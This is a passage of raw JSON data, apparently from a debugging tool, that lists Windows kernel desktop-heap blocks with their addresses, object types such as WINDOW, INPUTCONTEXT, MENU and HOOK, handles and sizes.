ze":25,"UnusedBytes":20},{"Block":"0xffffc8d50061fe00","Type":"WINDOW","Handle":"0x20040","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006226d0","Type":"WINDOW","Handle":"0x2004e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500622370","Type":"WINDOW","Handle":"0x30050","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627850","Type":"WINDOW","Handle":"0x30052","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621d70","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},
{"Block":"0xffffc8d50061eef0","Type":"WINDOW","Handle":"0x30054","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061f0b0","Type":"WINDOW","Handle":"0x20056","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006036b0","Type":"INPUTCONTEXT","Handle":"0x2006b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620100","Type":"WINDOW","Handle":"0x5006c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006279d0","Type":"WINDOW","Handle":"0x3006e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500627ce0","Type":"WINDOW","Handle":"0x30070","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617ac0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006020b0","Type":"INPUTCONTEXT","Handle":"0x2007b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b70","Type":"INPUTCONTEXT","Handle":"0x2007f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b00","Type":"INPUTCONTEXT","Handle":"0x20081","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601a90","Type":"INPUTCONTEXT","Handle":"0x20083","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500602040","Type":"INPUTCONTEXT","Handle":"0x100089","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601e50","Type":"WINDOW","Handle":"0x40094","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500600f10","Type":"INPUTCONTEXT","Handle":"0x10095","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ff80","Type":"WINDOW","Handle":"0x40096","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500602bf0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006022e0","Type":"INPUTCONTEXT","Handle":"0x80097","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006025d0","Type":"WINDOW","Handle":"0x20098","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500602100","Type":"WINDOW","Handle":"0x2009a","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500602d50","Type":"WINDOW","Handle":"0x1009c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603000","Type":"WINDOW","Handle":"0x1009e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603280","Ty
pe":"WINDOW","Handle":"0x100a0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500621700","Type":"INPUTCONTEXT","Handle":"0x300a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603520","Type":"WINDOW","Handle":"0x100a2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603810","Type":"WINDOW","Handle":"0x100a4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627b60","Type":"WINDOW","Handle":"0x300a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061b1d0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500609aa0","Type":"WINDOW","Handle":"0x200a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603d80","Type":"WINDOW","Handle":"0x100aa","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f670","Type":"INPUTCONTEXT","Handle":"0x300ab","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603f40","Type":"WINDOW","Handle":"0x100ac","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500603ac0","Type":"INPUTCONTEXT","Handle":"0x100ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500604350","Type":"WINDOW","Handle":"0x100ae","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006045c0","Type":"WINDOW","Handle":"0x100b0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604860","Type":"WINDOW","Handle":"0x100b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604d30","Type":"WINDOW","Handle":"0x200b4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625d40","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500604ed0","Type":"WINDOW","Handle":"0x100b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604ab0","Type":"INPUTCONTEXT","Handle":"0x100b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605130","Type":"WINDOW","Handle":"0x200b8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604b20","Type":"INPUTCONTEXT","Handle":"0x100b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605370","Type":"WINDOW","Handle":"0x100ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006050c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},
{"Block":"0xffffc8d5006055c0","Type":"WINDOW","Handle":"0x100bc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500604c00","Type":"INPUTCONTEXT","Handle":"0x100bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605820","Type":"WINDOW","Handle":"0x100be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006059e0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500620690","Type":"INPUTCONTEXT","Handle":"0x1500bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605b30","Type":"WINDOW","Handle":"0x100c0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609a50","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":24},{"Block":"0xffffc8d500605e40","Type":"WINDOW","Handle":"0x100c2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606040","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500608180","Type":"INPUTCONTEXT","Handle":"0x200c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006061e0","Type":"WINDOW","Handle":"0x100c4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606360","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500606440","Type":"WINDOW","Handle":"0x100c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006065c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500606640","Type":"WINDOW","Handle":"0x100c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608350","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":24},{"Block":"0xffffc8d5006067e0","Type":"WINDOW","Handle":"0x100ca","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006069a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609250","Type":"INPUTCONTEXT","Handle":"0x200cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500606c90","Type":"WINDOW","Handle":"0x100cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ab60","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500606e10","Type":"WI
NDOW","Handle":"0x100ce","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607170","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500606ff0","Type":"WINDOW","Handle":"0x100d0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d600","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609ff0","Type":"INPUTCONTEXT","Handle":"0x200d1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006071b0","Type":"WINDOW","Handle":"0x100d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606fb0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607420","Type":"WINDOW","Handle":"0x100d4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006075a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006075d0","Type":"WINDOW","Handle":"0x100d6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006098b0","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607790","Type":"WINDOW","Handle":"0x100d8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500611e10","Type":"INPUTCONTEXT","Handle":"0x300d9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607980","Type":"WINDOW","Handle":"0x100da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609900","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607c30","Type":"WINDOW","Handle":"0x100dc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e280","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607db0","Type":"WINDOW","Handle":"0x100de","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609860","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50060ae20","Type":"INPUTCONTEXT","Handle":"0x100df","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607fd0","Type":"WINDOW","Handle":"0x100e0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006097b0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006081d0","Type":"WINDOW","Handle":"0x100e2","Size":24,"UnusedBytes
":16},{"Block":"0xffffc8d500608390","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006083c0","Type":"WINDOW","Handle":"0x100e4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609820","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500615320","Type":"INPUTCONTEXT","Handle":"0x400e5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608580","Type":"WINDOW","Handle":"0x100e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061aac0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060c980","Type":"INPUTCONTEXT","Handle":"0x300e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608750","Type":"WINDOW","Handle":"0x100e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608700","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50060cb50","Type":"INPUTCONTEXT","Handle":"0x100e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006088d0","Type":"WINDOW","Handle":"0x100ea","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a70","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608aa0","Type":"WINDOW","Handle":"0x100ec","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a50","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500608d00","Type":"WINDOW","Handle":"0x100ee","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006090a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608eb0","Type":"WINDOW","Handle":"0x100f0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609070","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006090d0","Type":"WINDOW","Handle":"0x100f2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092d0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500609310","Type":"WINDOW","Handle":"0x100f4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607fa0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060e080","Type":"INPUTCONTEXT","
Handle":"0x700f5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609490","Type":"WINDOW","Handle":"0x100f6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607950","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060d0a0","Type":"INPUTCONTEXT","Handle":"0x100f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609610","Type":"WINDOW","Handle":"0x100f8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607b50","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006127d0","Type":"INPUTCONTEXT","Handle":"0xb00f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ac40","Type":"WINDOW","Handle":"0x200fa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ac0","Type":"INPUTCONTEXT","Handle":"0xa00fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006271e0","Type":"WINDOW","Handle":"0x300fc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609e70","Type":"WINDOW","Handle":"0x100fe","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9c0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d50060cd20","Type":"INPUTCONTEXT","Handle":"0x400ff","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a0f0","Type":"WINDOW","Handle":"0x10100","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060abb0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060f700","Type":"INPUTCONTEXT","Handle":"0x20101","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a350","Type":"WINDOW","Handle":"0x10102","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060aa40","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500621180","Type":"MENU","Handle":"0x60103","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628430","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060a4d0","Type":"WINDOW","Handle":"0x10104","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a650","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060eab0","Type":"INPUTCONTEXT","Handle":"0x201
05","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a850","Type":"WINDOW","Handle":"0x10106","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a9d0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d5006116b0","Type":"HOOK","Handle":"0x20107","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500616480","Type":"WINDOW","Handle":"0x20108","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060af20","Type":"WINDOW","Handle":"0x2010a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619880","Type":"INPUTCONTEXT","Handle":"0x1010b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b090","Type":"WINDOW","Handle":"0x1010c","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061a4c0","Type":"INPUTCONTEXT","Handle":"0x1010d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b2c0","Type":"WINDOW","Handle":"0x1010e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617030","Type":"INPUTCONTEXT","Handle":"0x1c010f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b4f0","Type":"WINDOW","Handle":"0x10110","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618a80","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50060b670","Type":"WINDOW","Handle":"0x10112","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b7f0","Type":"WINDOW","Handle":"0x10114","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060baa0","Type":"WINDOW","Handle":"0x10116","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060bc30","Type":"WINDOW","Handle":"0x10118","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c040","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061a510","Type":"INPUTCONTEXT","Handle":"0x10119","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060be90","Type":"WINDOW","Handle":"0x1011a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ba30","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50061aa00","Type":"INPUTCONTEXT","Handle":"0x1011b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c130","Type":"WIN
DOW","Handle":"0x1011c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9a0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061aa70","Type":"INPUTCONTEXT","Handle":"0x1011d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c360","Type":"WINDOW","Handle":"0x1011e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609050","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500624b30","Type":"WINDOW","Handle":"0x20120","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061ab00","Type":"INPUTCONTEXT","Handle":"0x10121","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c810","Type":"WINDOW","Handle":"0x10122","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060c670","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab70","Type":"INPUTCONTEXT","Handle":"0x10123","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c9d0","Type":"WINDOW","Handle":"0x10124","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061abe0","Type":"INPUTCONTEXT","Handle":"0x10125","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cba0","Type":"WINDOW","Handle":"0x10126","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006039c0","Type":"MENU","Handle":"0x20127","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500621750","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060cdb0","Type":"WINDOW","Handle":"0x10128","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500604b70","Type":"INPUTCONTEXT","Handle":"0x20129","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cf20","Type":"WINDOW","Handle":"0x1012a","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061aef0","Type":"INPUTCONTEXT","Handle":"0x1012b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d0f0","Type":"WINDOW","Handle":"0x1012c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500610980","Type":"MENU","Handle":"0x3012d","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006273c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060d2b0","Type":"WI
NDOW","Handle":"0x1012e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d450","Type":"WINDOW","Handle":"0x10130","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061c7d0","Type":"INPUTCONTEXT","Handle":"0x20131","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d700","Type":"WINDOW","Handle":"0x10132","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d880","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50061b380","Type":"INPUTCONTEXT","Handle":"0x10133","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d9c0","Type":"WINDOW","Handle":"0x10134","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060db70","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060dbb0","Type":"WINDOW","Handle":"0x10136","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060dd30","Type":"WINDOW","Handle":"0x10138","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060deb0","Type":"WINDOW","Handle":"0x1013a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bf50","Type":"INPUTCONTEXT","Handle":"0x7013b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e180","Type":"WINDOW","Handle":"0x1013c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061b9c0","Type":"INPUTCONTEXT","Handle":"0x3013d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e3c0","Type":"WINDOW","Handle":"0x1013e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060e6a0","Type":"WINDOW","Handle":"0x10140","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bcf0","Type":"INPUTCONTEXT","Handle":"0x10141","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e900","Type":"WINDOW","Handle":"0x10142","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617ef0","Type":"INPUTCONTEXT","Handle":"0x10143","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ec00","Type":"WINDOW","Handle":"0x10144","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060edf0","Type":"WINDOW","Handle":"0x10146","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006170d0","Type":"INPUTCONTEXT","Handle":"0x180147","Size":5,"
UnusedBytes":16},{"Block":"0xffffc8d50060f0c0","Type":"WINDOW","Handle":"0x10148","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006028f0","Type":"INPUTCONTEXT","Handle":"0x80149","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f4f0","Type":"WINDOW","Handle":"0x1014a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f750","Type":"WINDOW","Handle":"0x1014c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fa30","Type":"WINDOW","Handle":"0x1014e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fc00","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060c080","Type":"INPUTCONTEXT","Handle":"0x5014f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060fc60","Type":"WINDOW","Handle":"0x10150","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fde0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fe40","Type":"WINDOW","Handle":"0x10152","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ffc0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061c8b0","Type":"HOOK","Handle":"0x10153","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500610020","Type":"WINDOW","Handle":"0x10154","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006101a0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500610200","Type":"WINDOW","Handle":"0x10156","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610380","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061ae80","Type":"INPUTCONTEXT","Handle":"0x30157","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006103e0","Type":"WINDOW","Handle":"0x10158","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610560","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fbb0","Type":"INPUTCONTEXT","Handle":"0x50159","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006105c0","Type":"WINDOW","Handle":"0x1015a","Size":24,"UnusedBytes":16},{"Bl
ock":"0xffffc8d500610740","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d5006110f0","Type":"INPUTCONTEXT","Handle":"0x1015b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006107a0","Type":"WINDOW","Handle":"0x1015c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500611160","Type":"INPUTCONTEXT","Handle":"0x1015d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610a20","Type":"WINDOW","Handle":"0x1015e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121f0","Type":"INPUTCONTEXT","Handle":"0x2015f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610c90","Type":"WINDOW","Handle":"0x10160","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121a0","Type":"INPUTCONTEXT","Handle":"0x90161","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610f20","Type":"WINDOW","Handle":"0x10162","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006110c0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006111b0","Type":"WINDOW","Handle":"0x10164","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621be0","Type":"WINDOW","Handle":"0x30166","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612710","Type":"INPUTCONTEXT","Handle":"0x10167","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006114f0","Type":"WINDOW","Handle":"0x10168","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612780","Type":"INPUTCONTEXT","Handle":"0x10169","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611820","Type":"WINDOW","Handle":"0x1016a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500620620","Type":"INPUTCONTEXT","Handle":"0xb016b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611a90","Type":"WINDOW","Handle":"0x1016c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500611c10","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500612860","Type":"INPUTCONTEXT","Handle":"0x1016d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c4e0","Type":"WINDOW","Handle":"0x2
016e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006128d0","Type":"INPUTCONTEXT","Handle":"0x1016f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611e60","Type":"WINDOW","Handle":"0x10170","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612000","Type":"WINDOW","Handle":"0x10172","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613210","Type":"INPUTCONTEXT","Handle":"0x10173","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612350","Type":"WINDOW","Handle":"0x10174","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613280","Type":"INPUTCONTEXT","Handle":"0x10175","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006124c0","Type":"WINDOW","Handle":"0x10176","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ba0","Type":"INPUTCONTEXT","Handle":"0x10177","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612bb0","Type":"WINDOW","Handle":"0x10178","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500612e00","Type":"WINDOW","Handle":"0x1017a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613080","Type":"WINDOW","Handle":"0x1017c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613cc0","Type":"INPUTCONTEXT","Handle":"0x1017d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006133c0","Type":"WINDOW","Handle":"0x1017e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500614120","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d500613d10","Type":"HOOK","Handle":"0x2017f","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006135f0","Type":"WINDOW","Handle":"0x10180","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613770","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500613ef0","Type":"INPUTCONTEXT","Handle":"0x10181","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621d90","Type":"WINDOW","Handle":"0x20182","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613f40","Type":"INPUTCONTEXT","Handle":"0x10183","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006141e0","Type":"WINDOW","Handle":"0x20184","Size":23,"UnusedBytes":8},{"Block":
